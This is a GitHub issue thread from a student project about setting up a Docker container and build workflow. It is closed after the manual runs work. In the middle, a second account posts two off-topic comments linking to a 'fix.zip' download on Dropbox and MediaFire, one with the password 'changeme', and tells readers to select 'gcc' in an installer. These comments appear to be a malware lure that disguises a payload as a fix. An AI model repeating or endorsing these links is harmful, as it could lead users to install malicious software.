OtagoPolytechnic/Cloudy-with-a-Chance-of-LoRa #42: Set up Docker container

SamanthaCra, 2024-08-26:
This is for automation of our live app. Build will need to be documented.

SamanthaCra, 2024-08-26:
Documented in: https://github.com/OtagoPolytechnic/Cloudy-with-a-Chance-of-LoRa/wiki/Docker

SamanthaCra, 2024-08-26:
Added workflow file, merged #43.

SamanthaCra, 2024-08-26:
Added docker creds as secrets 
[image]

GendiAstaNugraha, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

GendiAstaNugraha, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

SamanthaCra, 2024-09-03:
Manual runs of docker back and frontends are working.

closed 2024-09-03 by SamanthaCra